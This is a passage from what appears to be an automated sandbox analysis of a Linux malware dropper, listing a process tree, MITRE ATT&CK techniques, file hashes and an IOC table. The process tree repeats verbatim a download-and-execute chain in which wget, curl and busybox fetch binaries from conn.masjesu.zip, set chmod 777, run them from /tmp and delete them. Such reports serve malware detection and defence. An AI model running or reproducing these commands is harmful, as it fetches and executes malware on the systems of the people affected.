  curl -O http://conn.masjesu.zip/bins/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:982
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - System Network Configuration Discovery
  PID:984
- /bin/chmod
  chmod 777 LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - File and Directory Permissions Modification
  PID:985
- /tmp/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  ./LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  - Executes dropped EXE
  PID:986
- /bin/rm
  rm LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
  2⤵
  PID:987
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - System Network Configuration Discovery
  PID:988
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:989
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - System Network Configuration Discovery
  PID:991
- /bin/chmod
  chmod 777 mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - File and Directory Permissions Modification
  PID:992
- /tmp/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  ./mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  - Executes dropped EXE
  PID:993
- /bin/rm
  rm mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
  2⤵
  PID:994
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  PID:995
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:996
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - System Network Configuration Discovery
  PID:998
- /bin/chmod
  chmod 777 iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - File and Directory Permissions Modification
  PID:999
- /tmp/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  ./iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  - Executes dropped EXE
  PID:1000
- /bin/rm
  rm iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
  2⤵
  PID:1001
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  PID:1002
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1003
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - System Network Configuration Discovery
  PID:1006
- /bin/chmod
  chmod 777 NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - File and Directory Permissions Modification
  PID:1009
- /tmp/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  ./NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  - Executes dropped EXE
  PID:1010
- /bin/rm
  rm NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
  2⤵
  PID:1011
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  PID:1012
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1013
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  - System Network Configuration Discovery
  PID:1015
- /bin/chmod
  chmod 777 n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  - File and Directory Permissions Modification
  PID:1016
- /tmp/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  ./n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  - Executes dropped EXE
  PID:1017
- /bin/rm
  rm n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
  2⤵
  PID:1018
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - System Network Configuration Discovery
  PID:1019
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1020
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - System Network Configuration Discovery
  PID:1022
- /bin/chmod
  chmod 777 KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - File and Directory Permissions Modification
  PID:1023
- /tmp/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  ./KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  - Executes dropped EXE
  PID:1024
- /bin/rm
  rm KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
  2⤵
  PID:1025

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM	754	SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
/tmp/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc	763	LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
/tmp/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH	794	mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
/tmp/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju	819	1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
/tmp/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC	830	XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
/tmp/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g	857	NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
/tmp/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK	874	n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
/tmp/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH	881	KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH
/tmp/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU	888	iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
/tmp/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS	895	fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
/tmp/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu	902	qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
/tmp/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9	909	KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
/tmp/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN	916	k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
/tmp/FCM86A67mxbnuYGfekV430o6jmwGzedwYH	923	FCM86A67mxbnuYGfekV430o6jmwGzedwYH
/tmp/fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS	930	fatMVMsfukCyslF0uKqpgLL9qwQICbpBIS
/tmp/FCM86A67mxbnuYGfekV430o6jmwGzedwYH	937	FCM86A67mxbnuYGfekV430o6jmwGzedwYH
/tmp/qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu	944	qeJBjGejXFWYkCo788vVihC3bRR1Cn93xu
/tmp/KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9	951	KCwEwU5T5Gtybmt4EvohtoURze2nwstkP9
/tmp/k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN	958	k51PeRNwgYJt7RoIQQcW2GcMgAu070mQFN
/tmp/1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju	965	1PnJdrAlVO5F1aDUkDyc3nZmH0YWkQlTju
/tmp/XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC	972	XdcqiUifew2ZZsPc2LTr3prXWRRto97HjC
/tmp/SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM	979	SwT6vwRIXqKcLxsQacZS2nLCh7B1tl3KeM
/tmp/LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc	986	LTll1cUdbkoBFEIy1SMQ8ls4xKcOTarmLc
/tmp/mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH	993	mStB1jIWmbweDTQgy7BvRSumadr3Ct4PlH
/tmp/iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU	1000	iqcP6nsHXHbALFr91KlxfTkWidZKebhqnU
/tmp/NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g	1010	NZhzSm9xbpj22vxymb89qxhP3VkWOjwp3g
/tmp/n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK	1017	n7z7bcQXGk067fv5GJBWKLcAwaTyb8CzmK
/tmp/KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH	1024	KxoRyONtTLh4yhaVehdbgSr4ifUGPj3uUH